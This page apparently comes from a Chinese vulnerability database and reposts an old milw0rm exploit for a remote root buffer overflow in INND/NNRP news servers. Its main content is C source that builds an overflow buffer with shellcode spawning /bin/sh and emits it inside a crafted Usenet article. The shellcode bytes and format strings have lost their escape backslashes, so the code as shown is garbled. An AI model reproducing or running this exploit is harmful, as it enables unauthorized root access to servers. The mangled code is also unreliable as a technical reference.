INND/NNRP < 1.6.x – Remote Overflow
漏洞ID | 1053494 | 漏洞类型 | |
发布时间 | 2000-11-30 | 更新时间 | 2000-11-30 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Linux | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
* INND/NNRP remote root overflow
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#define DEFAULT_OFFSET 792
#define BUFFER_SIZE 796
#define ADDRS 80
#define RET 0xefbf95e4
#define NOP "x08x21x02x80"
int main(argc, argv)
int argc;
char **argv;
{
char *buff = NULL, *ptr = NULL;
u_long *addr_ptr = NULL;
int ofs = DEFAULT_OFFSET;
int noplen;
int i, j;
u_char execshell[] =
"x34x16x05x06x96xd6x05x34x20x20x08x01"
"xe4x20xe0x08x0bx5ax02x9axe8x3fx1fxfd"
"x08x21x02x80x34x02x01x02x08x41x04x02"
"x60x40x01x62xb4x5ax01x54x0bx39x02x99"
"x0bx18x02x98x34x16x04xbex20x20x08x01"
"xe4x20xe0x08x96xd6x05x34xdexadxcaxfe"
"/bin/sh";
if(argc > 1)
ofs = atoi(argv[1]);
if(!(buff = malloc(4096)))
{
(void)fprintf(stderr, "can't allocate memoryn");
exit(1);
}
ptr = buff;
noplen = BUFFER_SIZE - strlen(execshell) - ADDRS;
for(i = 0; i < noplen / 4; i++)
{
for(j = 0; j < 4; j++)
*ptr++ = NOP[j];
}
*ptr += noplen;
for(i = 0; i < strlen(execshell); i++)
*ptr++ = execshell[i];
addr_ptr = (unsigned long *)ptr;
for(i = 0; i < ADDRS / 4; i++)
*addr_ptr++ = (RET - ofs);
ptr = (char *)addr_ptr;
*ptr = ' ';
(void)fprintf(stderr, "shellcode len: %d, RET: %xn", strlen(buff), RET-ofs);
printf(
"Path: babcia!padlinan"
"From: babunia @%sn"
"Newsgroups: pl.testn"
"Subject: testn"
"Message-ID: <[email protected]>n"
"Date: 26 Aug 1999 10:36:54 +0200n"
"Lines: 1n"
"n"
"west. test it.n"
".n", buff);
}
// milw0rm.com [2000-11-30]
相关推荐: Internet Security Systems ICECap Manager Default Username and Password Vulnerability
Internet Security Systems ICECap Manager Default Username and Password Vulnerability 漏洞ID 1104202 漏洞类型 Access Validation Error 发布时…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666